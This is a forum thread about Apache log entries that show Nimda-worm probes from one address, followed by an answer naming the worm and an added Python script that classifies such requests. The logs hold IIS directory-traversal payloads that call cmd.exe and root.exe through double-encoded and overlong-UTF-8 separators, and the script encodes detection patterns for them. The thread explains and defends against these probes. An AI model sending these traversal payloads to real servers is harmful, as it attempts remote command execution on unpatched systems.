• Status: Solved
• Priority: Medium
• Security: Public
• Views: 153

security problem, fix?

I'm getting a lot of GET requests from one particular IP addy, but I'm not sure what he's trying to do.  Here are some of the log entries:

68.83.207.195 - - [24/Feb/2003:13:46:57 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
68.83.207.195 - - [24/Feb/2003:13:46:58 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
68.83.207.195 - - [24/Feb/2003:13:46:59 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
68.83.207.195 - - [24/Feb/2003:13:47:00 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
68.83.207.195 - - [24/Feb/2003:13:47:00 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
68.83.207.195 - - [24/Feb/2003:13:47:02 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
68.83.207.195 - - [24/Feb/2003:13:47:03 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
68.83.207.195 - - [24/Feb/2003:13:47:03 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
68.83.207.195 - - [24/Feb/2003:13:47:04 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.83.207.195 - - [24/Feb/2003:13:47:04 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.83.207.195 - - [24/Feb/2003:13:47:05 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.83.207.195 - - [24/Feb/2003:13:47:05 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.83.207.195 - - [24/Feb/2003:13:47:06 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
68.83.207.195 - - [24/Feb/2003:13:47:07 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
68.83.207.195 - - [24/Feb/2003:13:47:08 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
68.83.207.195 - - [24/Feb/2003:13:47:09 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306

=========================================

Please tell me what he's doing and what I can do to stop anything malicious.  I'm running XP with the latest Apache.

Thanks,

(This question's worth a lot of points)

Jason
Asked by: yodaj007

1 Solution

linxit commented:
Hi,

This is the NIMDA worm in action - basically someone is running a non-patched IIS server which has been compromised by NIMDA and is trying to attack you. Don't worry, Apache is immune to it.

The patch has been available now for over a year so there's no excuse really on their part.

Unfortunately the hostname attached to that IP address (pcp02763091pcs.pthurn01.mi.comcast.net) suggests it's just a home user who probably doesn't even know he's running a webserver.

Andy
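As an added illustration (not part of the original thread or of either poster's text), the script below does what the asker's log shows Apache already doing implicitly: it parses common-log-format lines, normalises the request path by repeated percent-decoding, and tags the request shapes that mark this scanner traffic (cmd.exe/root.exe targets, "..\" traversal, double-encoded separators such as %255c, and the invalid UTF-8 lead bytes 0xC0/0xC1 behind %c0%af and %c1%1c). The sample log is constructed: the four scanner lines are copied from the question, the two benign lines with 192.0.2.x addresses are made up for contrast, and the tag names and the `scan`/`hits_by_ip` helpers are this example's own.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample: the 68.83.207.195 lines are from the question above; the
# 192.0.2.x lines are invented benign traffic so the classifier has something to ignore.
SAMPLE_LOG = """\
68.83.207.195 - - [24/Feb/2003:13:46:57 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
68.83.207.195 - - [24/Feb/2003:13:47:00 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
68.83.207.195 - - [24/Feb/2003:13:47:04 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.83.207.195 - - [24/Feb/2003:13:47:06 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
192.0.2.10 - - [24/Feb/2003:13:50:00 -0600] "GET /index.html HTTP/1.0" 200 1024
192.0.2.11 - - [24/Feb/2003:13:51:00 -0600] "GET /images/logo.png HTTP/1.0" 200 4096
"""

# Apache common log format: ip ident user [timestamp] "method path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>\S+)" (?P<status>\d{3}) (?P<size>\S+)'
)


def decode_path(raw, max_rounds=3):
    """Percent-decode until the result stops changing (bounded).

    Returns (decoded_bytes, rounds_that_changed_something). A path that needed
    more than one round was double-encoded, e.g. %255c -> %5c -> backslash.
    Bytes are used rather than str so invalid UTF-8 sequences survive intact.
    """
    data = raw.encode("latin-1", "replace")
    rounds = 0
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
        rounds += 1
    return data, rounds


def classify(raw_path):
    """Return the list of indicator tags that apply to one request path."""
    decoded, rounds = decode_path(raw_path)
    lowered = decoded.lower()
    tags = []
    if b"cmd.exe" in lowered or b"root.exe" in lowered:
        tags.append("shell-request")      # asks the server to run a command shell
    if b".." in decoded:
        tags.append("traversal")          # parent-directory escape after decoding
    if rounds > 1:
        tags.append("double-encoding")    # separator hidden behind a second layer of %xx
    if b"\xc0" in decoded or b"\xc1" in decoded:
        tags.append("overlong-utf8")      # 0xC0/0xC1 never lead a valid UTF-8 sequence
    return tags


def scan(log_text):
    """Parse every log line and return (ip, raw_path, tags) for the flagged ones."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in common log format
        tags = classify(m["path"])
        if tags:
            findings.append((m["ip"], m["path"], tuple(tags)))
    return findings


def hits_by_ip(log_text):
    """Count flagged requests per source address, for block-list or report decisions."""
    counts = {}
    for ip, _, _ in scan(log_text):
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    for ip, path, tags in scan(SAMPLE_LOG):
        print(ip, ", ".join(tags), path)
    print(hits_by_ip(SAMPLE_LOG))
```

The status column in the original log (404 and 400 on every line) already tells the asker that nothing was served; this classifier only summarises the request shapes so a run of them from one address stands out in a report or can feed a block rule. Decoding is bounded at three rounds on purpose: an attacker can nest encodings indefinitely, and a normaliser that loops until stable on untrusted input is itself a resource-exhaustion risk.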
